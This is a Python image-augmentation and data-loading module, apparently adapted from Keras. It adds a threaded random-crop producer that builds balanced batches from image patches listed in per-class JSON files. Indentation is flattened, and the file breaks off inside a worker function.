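#   centred_rot = transform_matrix_offset_center(rot, 224, 224)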
def apply_transform(x, transform_matrix, channel_axis=0, fill_mode='nearest', cval=0.):
x = np.rollaxis(x, channel_axis, 0)
final_affine_matrix = transform_matrix[:2, :2]
final_offset = transform_matrix[:2, 2]
channel_images = [ndi.interpolation.affine_transform(x_channel, final_affine_matrix,
final_offset, order=0, mode=fill_mode, cval=cval) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
def flip_axis(x, axis):
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
def standardize(x,
preprocessing_function=None,
rescale=None,
channel_axis=None,
samplewise_center=False,
featurewise_center=False,
samplewise_std_normalization=False,
featurewise_std_normalization=False,
mean=None,
std=None,
zca_whitening=False,
principal_components=None,
rng=None):
if preprocessing_function:
x = preprocessing_function(x)
if rescale:
x *= rescale
# x is a single image, so it doesn't have image number at index 0
img_channel_axis = channel_axis - 1
if samplewise_center:
x -= np.mean(x, axis=img_channel_axis, keepdims=True)
if samplewise_std_normalization:
x /= (np.std(x, axis=img_channel_axis, keepdims=True) + 1e-7)
if featurewise_center:
if mean is not None:
x -= mean
else:
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_center`, but it hasn\'t '
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
if featurewise_std_normalization:
if std is not None:
x /= (std + 1e-7)
else:
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_std_normalization`, but it hasn\'t '
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
if zca_whitening:
if principal_components is not None:
flatx = np.reshape(x, (x.size))
whitex = np.dot(flatx, principal_components)
x = np.reshape(whitex, (x.shape[0], x.shape[1], x.shape[2]))
else:
warnings.warn('This ImageDataGenerator specifies '
'`zca_whitening`, but it hasn\'t '
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
return x
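# Hedged example (illustrative; `x_img` is a placeholder name): rescale a
# 'tf'-ordered image to [0, 1] and zero-centre it per sample.
#
#   x_img = np.random.rand(224, 224, 3) * 255.0
#   x_std = standardize(x_img, rescale=1. / 255, channel_axis=3,
#                       samplewise_center=True)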
def random_transform(x,
row_axis=None,
col_axis=None,
channel_axis=None,
rotation_range=0.,
height_shift_range=0.,
width_shift_range=0.,
shear_range=0.,
zoom_range=0.,
fill_mode='nearest',
cval=0.,
channel_shift_range=0.,
horizontal_flip=False,
vertical_flip=False,
rng=None):
supplied_rngs = True
if rng is None:
supplied_rngs = False
rng = np.random
# x is a single image, so it doesn't have image number at index 0
img_row_axis = row_axis - 1
img_col_axis = col_axis - 1
img_channel_axis = channel_axis - 1
# use composition of homographies
# to generate final transform that needs to be applied
if rotation_range:
theta = np.pi / 180 * rng.uniform(-rotation_range, rotation_range)
else:
theta = 0
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],
[np.sin(theta), np.cos(theta), 0],
[0, 0, 1]])
if height_shift_range:
tx = rng.uniform(-height_shift_range, height_shift_range) * x.shape[img_row_axis]
else:
tx = 0
if width_shift_range:
ty = rng.uniform(-width_shift_range, width_shift_range) * x.shape[img_col_axis]
else:
ty = 0
translation_matrix = np.array([[1, 0, tx],
[0, 1, ty],
[0, 0, 1]])
if shear_range:
shear = rng.uniform(-shear_range, shear_range)
else:
shear = 0
shear_matrix = np.array([[1, -np.sin(shear), 0],
[0, np.cos(shear), 0],
[0, 0, 1]])
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = rng.uniform(zoom_range[0], zoom_range[1], 2)
zoom_matrix = np.array([[zx, 0, 0],
[0, zy, 0],
[0, 0, 1]])
transform_matrix = np.dot(np.dot(np.dot(rotation_matrix,
translation_matrix),
shear_matrix),
zoom_matrix)
h, w = x.shape[img_row_axis], x.shape[img_col_axis]
transform_matrix = transform_matrix_offset_center(transform_matrix, h, w)
x = apply_transform(x, transform_matrix, img_channel_axis,
fill_mode=fill_mode, cval=cval)
if channel_shift_range != 0:
x = random_channel_shift(x,
channel_shift_range,
img_channel_axis)
get_random = None
if supplied_rngs:
get_random = rng.rand
else:
get_random = np.random.random
if horizontal_flip:
if get_random() < 0.5:
x = flip_axis(x, img_col_axis)
if vertical_flip:
if get_random() < 0.5:
x = flip_axis(x, img_row_axis)
return x
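# Hedged usage sketch (not part of the original module): augment a single
# 'tf'-ordered image. Note that `zoom_range` must already be a 2-element
# sequence here; the scalar-to-range conversion happens in
# ImageDataGenerator.__init__.
#
#   x_aug = random_transform(np.random.rand(224, 224, 3),
#                            row_axis=1, col_axis=2, channel_axis=3,
#                            rotation_range=90., height_shift_range=0.1,
#                            width_shift_range=0.1, zoom_range=(0.9, 1.1),
#                            horizontal_flip=True)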
def array_to_img(x, dim_ordering='default', scale=True):
"""Converts a 3D Numpy array to a PIL Image instance.
# Arguments
x: Input Numpy array.
dim_ordering: Image data format.
scale: Whether to rescale image values
to be within [0, 255].
# Returns
A PIL Image instance.
# Raises
ImportError: if PIL is not available.
ValueError: if invalid `x` or `dim_ordering` is passed.
"""
if pil_image is None:
raise ImportError('Could not import PIL.Image. '
'The use of `array_to_img` requires PIL.')
x = np.asarray(x)
if x.ndim != 3:
raise ValueError('Expected image array to have rank 3 (single image). '
'Got array with shape:', x.shape)
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Invalid dim_ordering:', dim_ordering)
# Original Numpy array x has format (height, width, channel)
# or (channel, height, width)
# but target PIL image has format (width, height, channel)
if dim_ordering == 'th':
x = x.transpose(1, 2, 0)
if scale:
x = x + max(-np.min(x), 0)
x_max = np.max(x)
if x_max != 0:
x /= x_max
x *= 255
if x.shape[2] == 3:
# RGB
return pil_image.fromarray(x.astype('uint8'), 'RGB')
elif x.shape[2] == 1:
# grayscale
return pil_image.fromarray(x[:, :, 0].astype('uint8'), 'L')
else:
raise ValueError('Unsupported channel number: ', x.shape[2])
def img_to_array(img, dim_ordering='default'):
"""Converts a PIL Image instance to a Numpy array.
# Arguments
img: PIL Image instance.
dim_ordering: Image data format.
# Returns
A 3D Numpy array (float32).
# Raises
ValueError: if invalid `img` or `dim_ordering` is passed.
"""
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering: ', dim_ordering)
# Numpy array x has format (height, width, channel)
# or (channel, height, width)
# but original PIL image has format (width, height, channel)
x = np.asarray(img, dtype='float32')
if len(x.shape) == 3:
if dim_ordering == 'th':
x = x.transpose(2, 0, 1)
elif len(x.shape) == 2:
if dim_ordering == 'th':
x = x.reshape((1, x.shape[0], x.shape[1]))
else:
x = x.reshape((x.shape[0], x.shape[1], 1))
else:
raise ValueError('Unsupported image shape: ', x.shape)
return x
def load_img(path, grayscale=False, target_size=None):
"""Loads an image into PIL format.
# Arguments
path: Path to image file
grayscale: Boolean, whether to load the image as grayscale.
target_size: Either `None` (default to original size)
or tuple of ints `(img_height, img_width)`.
# Returns
A PIL Image instance.
# Raises
ImportError: if PIL is not available.
"""
if pil_image is None:
raise ImportError('Could not import PIL.Image. '
'The use of `array_to_img` requires PIL.')
img = pil_image.open(path)
if grayscale:
img = img.convert('L')
else:  # ensure 3 channels even when the loaded image is grayscale
img = img.convert('RGB')
if target_size:
img = img.resize((target_size[1], target_size[0]))
return img
def list_pictures(directory, ext='jpg|jpeg|bmp|png'):
return [os.path.join(root, f)
for root, _, files in os.walk(directory) for f in files
if re.match(r'([\w]+\.(?:' + ext + r'))', f)]
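# Hedged example (the path is a placeholder): recursively collect every .png
# under a dataset directory.
#
#   png_paths = list_pictures('/data/patches', ext='png')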
class RandomCrop(object):
def __init__(self,
json_path,
is_training=False,
crop_patch_nb=0,
max_retry_cnt=5,
non_zero_rate=0.7,
foreground_rate=1,
crop_width=511,
crop_height=511,
crop_channel=3,
is_shuffle=True,
readers=1,
num_threads=2,
info_maxsize=3000,
data_maxsize=1000):
self.json_path = json_path
self.is_training = is_training
self.crop_patch_nb = crop_patch_nb
self.max_retry_cnt = max_retry_cnt
self.non_zero_rate = non_zero_rate
self.foreground_rate = foreground_rate
self.crop_width = crop_width
self.crop_height = crop_height
self.crop_channel = crop_channel
self.label = None
self.is_shuffle = is_shuffle
self.readers = readers
self.num_threads = num_threads
self.info_maxsize = info_maxsize
self.data_maxsize = data_maxsize
self.threads = []
self.is_running = False
self.info_head_lock = threading.Lock()
self.info_tail_lock = threading.Lock()
self.data_lock = threading.Lock()
self.json_path_list = self.get_json_path_list()
# create the queues, then create and start the worker threads
self._queue()
self.start_queue_runners()
# processing of basic patches info
def get_json_path_list(self):
json_path_list = glob.glob(os.path.join(self.json_path, '*.json'))
return json_path_list
def get_all_patch_mask_path_list(self):
all_patches_dic_info = []
for json_index in range(len(self.json_path_list)):
# load json and cal numbers of patch in each json
json_path = self.json_path_list[json_index]
fopen = open(json_path)
json_info = json.load(fopen)
# json_info is a dict
# keys:'image_id', 'data_origin', 'level', 'label' and 'patches'
# patches is a list containing several dictionaries
# keys: 'patch_id', 'img_path', 'mask_path' and 'patch_size'
self.label = json_info['label']
nb_patches_in_each_json = len(json_info['patches'])
for patch_index in range(nb_patches_in_each_json):
patch_dic_info = json_info['patches'][patch_index]
all_patches_dic_info.append(patch_dic_info)
return all_patches_dic_info
def shuffle(self, is_shuffle):
all_patches_dic_info = self.get_all_patch_mask_path_list()
all_patches_dic_info = shuffle_list(all_patches_dic_info, is_shuffle)
return all_patches_dic_info
def get_nb_samples_per_epoch(self):
return len(self.get_all_patch_mask_path_list())
def get_crop_patch_np(self):
return self.crop_patch_nb
# random crop function of training set
def random_crop_once(self, json_info_patch):
# 1 get basic info of patch and load mask
patch_width = json_info_patch['patch_size'][0]
patch_height = json_info_patch['patch_size'][1]
if (patch_width >= self.crop_width) and (patch_height >= self.crop_height):
logger.info('====image_path====: {}' .format(json_info_patch['img_path']))
logger.info('=====mask_path====: {}' .format(json_info_patch['mask_path']))
if json_info_patch['mask_path'] != 'None':
mask_pil = Image.open(json_info_patch['mask_path'])
# print(json_info_patch['mask_path'])
image_pil = Image.open(json_info_patch['img_path'])
# print(json_info_patch['img_path'])
for iter in range(self.max_retry_cnt):
# 2 Get random coordinate
loc_x = patch_width - self.crop_width
loc_y = patch_height - self.crop_height
get_x = random.randint(0, loc_x)
get_y = random.randint(0, loc_y)
# 3 crop mask, cal non_zeros_rate
if json_info_patch['mask_path'] == 'None':
# middle patch without annotation, regard non_zero_count in mask as 1
non_zero_rate = 1
else:
# middle patch with annotation, random crop mask
mask_pil_roi = \
mask_pil.crop((get_x, get_y, get_x + self.crop_width, get_y + self.crop_height))
mask_pil_roi_np = np.array(mask_pil_roi)
non_zero_count = np.count_nonzero(mask_pil_roi_np)
non_zero_rate = non_zero_count / (self.crop_width * self.crop_height)
logger.info('=====non_zero_rate====: {}' .format(non_zero_rate))
# 4 decide actions according to non_zeros_rate
if non_zero_rate >= self.non_zero_rate:
# 4.1 crop image
image_pil_roi = \
image_pil.crop((get_x, get_y, get_x + self.crop_width, get_y + self.crop_height))
image_pil_roi_np = np.array(image_pil_roi)
if self.foreground_rate != 1:
# 4.1.1 background filtering is needed
# image_thresh = extract_foreground_mask(image_pil_roi_np)
# pdb.set_trace()
fgmask_pil = Image.open(json_info_patch['fgmask_path']).crop((get_x, get_y, get_x + self.crop_width, get_y + self.crop_height))
fg_count = np.count_nonzero(np.array(fgmask_pil))
fg_rate = fg_count / (self.crop_width * self.crop_height)
logger.info('train {} image, after extract_foreground, foreground_rate is: {}' .format(self.label, fg_rate))
if fg_rate < self.foreground_rate:
# 4.1.1.1 crop again
continue
else:
# 4.1.2 no background filtering needed, regard foreground_rate as 1
fg_rate = 1
break
else:
# 4.2 crop again
fg_rate = 0
continue
if (iter == (self.max_retry_cnt - 1)) and (fg_rate < self.foreground_rate):
image_pil_roi_np = None
else:
image_pil_roi_np = None
fg_rate = 0
logger.info("Error! Patch size smaller that target!")
return image_pil_roi_np, fg_rate
# function of eval set
def eval_image(self, json_info_patch):
# 1 get basic info of patch and load mask
# pdb.set_trace()
patch_width = json_info_patch['patch_size'][0]
patch_height = json_info_patch['patch_size'][1]
if (patch_width == self.crop_width) and (patch_height == self.crop_height):
# 2 open image and transform to array
logger.info('====eval img_path===: {}' .format(json_info_patch['img_path']))
image_pil_roi = Image.open(json_info_patch['img_path'])
image_pil_roi_np = np.array(image_pil_roi)
# print(json_info_patch['img_path'])
if self.foreground_rate != 1:
# 3.1 background filtering is needed
if json_info_patch['mask_path'] != 'None':
# 3.1.1 middle patch (with mask) needs background filtering
# image_thresh = extract_foreground_mask(image_pil_roi_np)
# the eval patch already matches the crop size (checked above), so use the whole foreground mask
fgmask_pil = Image.open(json_info_patch['fgmask_path'])
fg_count = np.count_nonzero(np.array(fgmask_pil))
fg_rate = fg_count / (self.crop_width * self.crop_height)
logger.info('eval {} image, foreground_rate: {}' .format(self.label, fg_rate))
else:
# 3.1.2 middle patch (without mask) does not need background filtering
fg_rate = 1
else:
# 3.2 no background filtering needed, regard foreground_rate as 1
fg_rate = 1
else:
fg_rate = 0
image_pil_roi_np = None
logger.info('the size of eval image is wrong!')
return image_pil_roi_np, fg_rate
# queue
def _queue(self):
self.info_queue = Queue(maxsize=self.info_maxsize)
self.data_queue = Queue(maxsize=self.data_maxsize)
def get_queue(self):
return self.data_queue
def close_queue(self):
# https://github.com/mwfrojdman/cpython/blob/closeable_queue/Lib/queue.py
# https://stackoverflow.com/questions/6517953/clear-all-items-from-the-queue
self.info_queue.mutex.acquire()
self.info_queue.queue.clear()
self.info_queue.not_empty.notify_all()
self.info_queue.not_full.notify_all()
self.info_queue.all_tasks_done.notify_all()
self.info_queue.unfinished_tasks = 0
self.info_queue.mutex.release()
self.data_queue.mutex.acquire()
self.data_queue.queue.clear()
self.data_queue.not_empty.notify_all()
self.data_queue.not_full.notify_all()
self.data_queue.all_tasks_done.notify_all()
self.data_queue.unfinished_tasks = 0
self.data_queue.mutex.release()
# thread
def info_input_producer(self, info_list):
while self.get_work_threads_status():
for info in info_list:
if not self.get_work_threads_status():
break
self.info_tail_lock.acquire()
self.info_queue.put(info)
self.info_tail_lock.release()
logger.info('*************info thread is end!**************')
def data_input_producer(self):
while self.get_work_threads_status():
while (not self.info_queue.empty()) and self.get_work_threads_status():
self.info_head_lock.acquire()
patch_dic_info = self.info_queue.get()
self.info_head_lock.release()
# pdb.set_trace()
if self.is_training:
image, rate = self.random_crop_once(patch_dic_info)
else:
image, rate = self.eval_image(patch_dic_info)
if rate >= self.foreground_rate:
self.data_lock.acquire()
self.data_queue.put([image.astype(np.float32), self.label])
self.data_lock.release()
logger.info('*************data thread is end!***************')
def start_queue_runners(self):
for _ in range(self.readers):
t = threading.Thread(target=self.info_input_producer, args=(self.shuffle(self.is_shuffle), ))
self.threads.append(t)
for _ in range (self.num_threads):
t = threading.Thread(target=self.data_input_producer, args=())
self.threads.append(t)
self.set_work_threads_status_start()
for i in range(len(self.threads)):
self.threads[i].setDaemon(True)
self.threads[i].start()
def get_threads(self):
return self.threads
def set_work_threads_status_start(self):
self.is_running = True
def set_work_threads_status_stop(self):
self.is_running = False
def get_work_threads_status(self):
return self.is_running
def end_work_threads_and_queues(self):
self.close_queue()
for index, thread in enumerate(self.get_threads()):
thread.join()
self.close_queue()
class ImageDataGenerator(object):
"""Generate minibatches of image data with real-time data augmentation.
# Arguments
featurewise_center: set input mean to 0 over the dataset.
samplewise_center: set each sample mean to 0.
featurewise_std_normalization: divide inputs by std of the dataset.
samplewise_std_normalization: divide each input by its std.
zca_whitening: apply ZCA whitening.
rotation_range: degrees (0 to 180).
width_shift_range: fraction of total width.
height_shift_range: fraction of total height.
shear_range: shear intensity (shear angle in radians).
zoom_range: amount of zoom. if scalar z, zoom will be randomly picked
in the range [1-z, 1+z]. A sequence of two can be passed instead
to select this range.
channel_shift_range: shift range for each channels.
fill_mode: points outside the boundaries are filled according to the
given mode ('constant', 'nearest', 'reflect' or 'wrap'). Default
is 'nearest'.
cval: value used for points outside the boundaries when fill_mode is
'constant'. Default is 0.
horizontal_flip: whether to randomly flip images horizontally.
vertical_flip: whether to randomly flip images vertically.
rescale: rescaling factor. If None or 0, no rescaling is applied,
otherwise we multiply the data by the value provided
(before applying any other transformation).
preprocessing_function: function that will be applied to each input.
The function will run before any other modification on it.
The function should take one argument:
one image (Numpy tensor with rank 3),
and should output a Numpy tensor with the same shape.
dim_ordering: 'th' or 'tf'. In 'th' mode, the channels dimension
(the depth) is at index 1, in 'tf' mode it is at index 3.
It defaults to the `image_dim_ordering` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "tf".
pool: an open multiprocessing.Pool that will be used to
process multiple images in parallel. If left off or set to
None, then the default serial processing with a single
process will be used.
"""
def __init__(self,
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=0.,
width_shift_range=0.,
height_shift_range=0.,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
fill_mode='nearest',
cval=0.,
horizontal_flip=False,
vertical_flip=False,
rescale=None,
preprocessing_function=None,
dim_ordering='default',
pool=None,
nb_gpu=4):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
self.featurewise_center = featurewise_center
self.samplewise_center = samplewise_center
self.featurewise_std_normalization = featurewise_std_normalization
self.samplewise_std_normalization = samplewise_std_normalization
self.zca_whitening = zca_whitening
self.rotation_range = rotation_range
self.width_shift_range = width_shift_range
self.height_shift_range = height_shift_range
self.shear_range = shear_range
self.zoom_range = zoom_range
self.channel_shift_range = channel_shift_range
self.fill_mode = fill_mode
self.cval = cval
self.horizontal_flip = horizontal_flip
self.vertical_flip = vertical_flip
self.rescale = rescale
self.preprocessing_function = preprocessing_function
self.pool = pool
self.nb_gpu=nb_gpu
if dim_ordering not in {'tf', 'th'}:
raise ValueError('dim_ordering should be "tf" (channel after row and '
'column) or "th" (channel before row and column). '
'Received arg: ', dim_ordering)
self.dim_ordering = dim_ordering
if dim_ordering == 'th':
self.channel_axis = 1
self.row_axis = 2
self.col_axis = 3
if dim_ordering == 'tf':
self.channel_axis = 3
self.row_axis = 1
self.col_axis = 2
self.mean = None
self.std = None
self.principal_components = None
if np.isscalar(zoom_range):
self.zoom_range = [1 - zoom_range, 1 + zoom_range]
elif len(zoom_range) == 2:
self.zoom_range = [zoom_range[0], zoom_range[1]]
else:
raise ValueError('zoom_range should be a float or '
'a tuple or list of two floats. '
'Received arg: ', zoom_range)
def flow(self, X, y=None, batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_format='jpeg'):
return NumpyArrayIterator(
X, y, self,
batch_size=batch_size,
shuffle=shuffle,
seed=seed,
dim_ordering=self.dim_ordering,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
pool=self.pool)
def flow_from_directory(self, directory,
target_size=(256, 256), color_mode='rgb',
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None,
save_prefix='',
save_format='jpeg',
nb_gpu=4,
follow_links=False,
phase=None,
save_list_dir=None):
return DirectoryIterator(
directory, self,
target_size=target_size, color_mode=color_mode,
classes=classes, class_mode=class_mode,
dim_ordering=self.dim_ordering,
batch_size=batch_size, shuffle=shuffle, seed=seed,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
follow_links=follow_links,
pool=self.pool,
nb_gpu=nb_gpu,
phase=phase,
save_list_dir=save_list_dir)
def flow_from_json(self, json_file_path,
target_size=(256, 256), color_mode='rgb',
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None,
save_prefix='',
save_format='jpeg',
follow_links=False,
nb_gpu=4,
is_training=True):
return JsonIterator(
json_file_path, self,
target_size=target_size, color_mode=color_mode,
classes=classes, class_mode=class_mode,
dim_ordering=self.dim_ordering,
batch_size=batch_size, shuffle=shuffle, seed=seed,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
follow_links=follow_links,
pool=self.pool,
nb_gpu=nb_gpu,
is_training=is_training)
def pipeline(self):
"""A pipeline of functions to apply in order to an image.
"""
return [
(random_transform, dict(
row_axis=self.row_axis,
col_axis=self.col_axis,
channel_axis=self.channel_axis,
rotation_range=self.rotation_range,
height_shift_range=self.height_shift_range,
width_shift_range=self.width_shift_range,
shear_range=self.shear_range,
zoom_range=self.zoom_range,
fill_mode=self.fill_mode,
cval=self.cval,
channel_shift_range=self.channel_shift_range,
horizontal_flip=self.horizontal_flip,
vertical_flip=self.vertical_flip)
),
(standardize, dict(
preprocessing_function=self.preprocessing_function,
rescale=self.rescale,
channel_axis=self.channel_axis,
samplewise_center=self.samplewise_center,
samplewise_std_normalization=self.samplewise_std_normalization,
featurewise_center=self.featurewise_center,
mean=self.mean,
featurewise_std_normalization=self.featurewise_std_normalization,
std=self.std,
zca_whitening=self.zca_whitening,
principal_components=self.principal_components)
)
]
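# Hedged note (illustrative, not from the original): each (func, kwargs) pair
# returned above is applied in order per image, mirroring what the
# process_image_pipeline* worker functions below do, e.g.
#
#   for func, kwargs in datagen.pipeline():
#       x = func(x, rng=np.random, **kwargs)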
def standardize(self, x):
return standardize(x,
preprocessing_function=self.preprocessing_function,
rescale=self.rescale,
channel_axis=self.channel_axis,
samplewise_center=self.samplewise_center,
samplewise_std_normalization=self.samplewise_std_normalization,
featurewise_center=self.featurewise_center,
mean=self.mean,
featurewise_std_normalization=self.featurewise_std_normalization,
std=self.std,
zca_whitening=self.zca_whitening,
principal_components=self.principal_components)
def random_transform(self, x):
return random_transform(x,
row_axis=self.row_axis,
col_axis=self.col_axis,
channel_axis=self.channel_axis,
rotation_range=self.rotation_range,
height_shift_range=self.height_shift_range,
width_shift_range=self.width_shift_range,
shear_range=self.shear_range,
zoom_range=self.zoom_range,
fill_mode=self.fill_mode,
cval=self.cval,
channel_shift_range=self.channel_shift_range,
horizontal_flip=self.horizontal_flip,
vertical_flip=self.vertical_flip)
def fit(self, x,
augment=False,
rounds=1,
seed=None):
"""Required for featurewise_center, featurewise_std_normalization
and zca_whitening.
# Arguments
x: Numpy array, the data to fit on. Should have rank 4.
In case of grayscale data,
the channels axis should have value 1, and in case
of RGB data, it should have value 3.
augment: Whether to fit on randomly augmented samples
rounds: If `augment`,
how many augmentation passes to do over the data
seed: random seed.
# Raises
ValueError: in case of invalid input `x`.
"""
x = np.asarray(x)
if x.ndim != 4:
raise ValueError('Input to `.fit()` should have rank 4. '
'Got array with shape: ' + str(x.shape))
if x.shape[self.channel_axis] not in {1, 3, 4}:
raise ValueError(
'Expected input to be images (as Numpy array) '
'following the dimension ordering convention "' + self.dim_ordering + '" '
'(channels on axis ' + str(self.channel_axis) + '), i.e. expected '
'either 1, 3 or 4 channels on axis ' + str(self.channel_axis) + '. '
'However, it was passed an array with shape ' + str(x.shape) +
' (' + str(x.shape[self.channel_axis]) + ' channels).')
if seed is not None:
np.random.seed(seed)
x = np.copy(x)
if augment:
ax = np.zeros(tuple([rounds * x.shape[0]] + list(x.shape)[1:]))
for r in range(rounds):
for i in range(x.shape[0]):
ax[i + r * x.shape[0]] = self.random_transform(x[i])
x = ax
if self.featurewise_center:
self.mean = np.mean(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.mean = np.reshape(self.mean, broadcast_shape)
x -= self.mean
if self.featurewise_std_normalization:
self.std = np.std(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.std = np.reshape(self.std, broadcast_shape)
x /= (self.std + K.epsilon())
if self.zca_whitening:
flat_x = np.reshape(x, (x.shape[0], x.shape[1] * x.shape[2] * x.shape[3]))
sigma = np.dot(flat_x.T, flat_x) / flat_x.shape[0]
u, s, _ = linalg.svd(sigma)
self.principal_components = np.dot(np.dot(u, np.diag(1. / np.sqrt(s + 10e-7))), u.T)
class Iterator(object):
def __init__(self, batch_size, shuffle, seed, n=None):
# self.n_total = n_total
# self.n_neg = n_negative
self.batch_size = batch_size
self.shuffle = shuffle
self.batch_index = 0
self.total_batches_seen = 0
self.lock = threading.Lock()
# self.index_generator_n_total = self._flow_index(n_total, batch_size, shuffle, seed)
# self.index_generator_negative = self._flow_index(n_negative, batch_size, shuffle, seed)
# NumpyArrayIterator and DirectoryIterator pass their sample count `n`;
# JsonIterator does not, so the index generator is only built when n is given
if n is not None:
self.index_generator = self._flow_index(n, batch_size, shuffle, seed)
# create multiple random number generators to be used separately in
# each process when using a multiprocessing.Pool
if seed:
self.rngs = [np.random.RandomState(seed + i) for i in range(batch_size)]
else:
self.rngs = [np.random.RandomState(i) for i in range(batch_size)]
def end_subthreads(objects):
"""
Args:
objects: object of RandomCrop class
Returns:
None
"""
for obj in objects:
obj.set_work_threads_status_stop()
obj.end_work_threads_and_queues()
def image_data_generator(objects, batch_size):
"""
Args:
objects: list of RandomCrop instances, one per class.
Returns:
batch_images_and_labels: [[image, label], [image, label], ...]
"""
# drain the queue of each RandomCrop object to assemble balanced batches of [image, label] pairs
while True:
start_time = time.time()
batch_images_and_labels = []
for obj in objects:
queue = obj.get_queue()
while not queue.empty():
for _ in range(obj.get_crop_patch_np()):
batch_images_and_labels.append(queue.get())
break
if len(batch_images_and_labels) == batch_size:
end_time = time.time()
logger.info('=============================================')
logger.info('batch time: {}' .format(end_time - start_time))
logger.info('=============================================')
yield batch_images_and_labels
def get_instance_objects(train_base_path,
eval_base_path,
labels,
nb_per_class,
max_retry_cnt=5,
non_zero_rate=0.7,
crop_width=511,
crop_height=511,
crop_channel=3,
is_training=False,
is_shuffle=True,
readers=1,
num_threads=2,
info_maxsize=750,
data_maxsize=250,
foreground_rate_per_class=[]):
"""
Args:
train_base_path: Base path of the training set; for details, see README.md.
eval_base_path: Base path of the eval set; for details, see README.md.
labels: List of all classes to generate.
nb_per_class: List of numbers of samples for each class.
max_retry_cnt: The max retry counts of random crop, default 5.
non_zero_rate: The rate of non zero in mask after random crop, default 0.7,
set non_zero_rate=1 for middle patch without mask.
crop_width: The width of random crop image.
crop_height: The height of random crop image.
crop_channel: The channels of random crop image.
is_training: Default 'False'; if set to 'True', generate data for training, otherwise for eval.
is_shuffle: Default 'True'; if set to 'True', the sample list will be shuffled.
readers: The number of threads which push info into info queue.
num_threads: The number of threads which push data into data queue.
info_maxsize: The capacity of info queue.
data_maxsize: The capacity of data queue.
foreground_rate_per_class: Default []; if len(foreground_rate_per_class) != len(labels), it
will be extended with 1s up to len(labels), where 1 stands for no background filtering.
e.g. labels = [tumor, benign, insitu, invasive], foreground_rate_per_class = [0.3, 0.5]
then foreground_rate_per_class will be extended to [0.3, 0.5, 1, 1].
Returns:
List of generators for each class in labels list.
"""
assert len(labels) == len(nb_per_class), \
'the length of labels must equal the length of nb_per_class!'
if len(foreground_rate_per_class) != len(labels):
len_need_to_extend = len(labels) - len(foreground_rate_per_class)
foreground_rate_per_class.extend([1] * len_need_to_extend)
objs = []
nb_samples_per_epoch = []
# pdb.set_trace()
for label, num, foreground_rate in zip(labels, nb_per_class, foreground_rate_per_class):
if is_training:
json_path = os.path.join(train_base_path, label + '/json')
else:
json_path = os.path.join(eval_base_path, label + '/json')
# print("INFO {}".format(json_path))
obj = RandomCrop(json_path=json_path,
is_training=is_training,
crop_patch_nb=num,
max_retry_cnt=max_retry_cnt,
non_zero_rate=non_zero_rate,
foreground_rate=foreground_rate,
crop_width=crop_width,
crop_height=crop_height,
crop_channel=crop_channel,
is_shuffle=is_shuffle,
readers=readers,
num_threads=num_threads,
info_maxsize=info_maxsize,
data_maxsize=data_maxsize)
objs.append(obj)
nb_samples_per_epoch.append(obj.get_nb_samples_per_epoch())
return objs, nb_samples_per_epoch
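# Hedged usage sketch (paths and label names are placeholders): build one
# RandomCrop producer per class and drain their queues into balanced batches.
#
#   objs, n_per_epoch = Iterator.get_instance_objects(
#       train_base_path='/data/train', eval_base_path='/data/eval',
#       labels=['normal', 'tumor'], nb_per_class=[16, 16],
#       foreground_rate_per_class=[0.1, 0.7], is_training=True,
#       crop_width=224, crop_height=224)
#   gen = Iterator.image_data_generator(objs, batch_size=sum([16, 16]))
#   batch = next(gen)               # list of [image, label] pairs
#   Iterator.end_subthreads(objs)   # stop the producer threads when done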
def reset(self):
self.batch_index = 0
def _flow_index(self, n, batch_size=32, shuffle=False, seed=None):
# ensure self.batch_index is 0
self.reset()
while 1:
if seed is not None:
np.random.seed(seed + self.total_batches_seen)
if self.batch_index == 0:
index_array = np.arange(n)
if shuffle:
index_array = np.random.permutation(n)
else:
index_array = index_array[:n]
current_index = (self.batch_index * batch_size) % n
if n >= current_index + int(batch_size/2):
current_batch_size = int(batch_size/2)
self.batch_index += 1
else:
current_batch_size = n - current_index
self.batch_index = 0
self.total_batches_seen += 1
yield (index_array[current_index: current_index + current_batch_size],
current_index, current_batch_size)
def __iter__(self):
# needed if we want to do something like:
# for x, y in data_gen.flow(...):
return self
def __next__(self, *args, **kwargs):
return self.next(*args, **kwargs)
def process_image_pipeline(tup):
""" Worker function for NumpyArrayIterator multiprocessing.Pool
"""
(pipeline, x, rng) = tup
x = x.astype('float32')
for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
return x
def process_image_pipeline_dir(tup):
""" Worker function for DirectoryIterator multiprocessing.Pool
"""
(pipeline, fname, directory, grayscale,
target_size, dim_ordering, rng) = tup
img = load_img(os.path.join(directory, fname),
grayscale=grayscale,
target_size=target_size)
x = img_to_array(img, dim_ordering=dim_ordering)
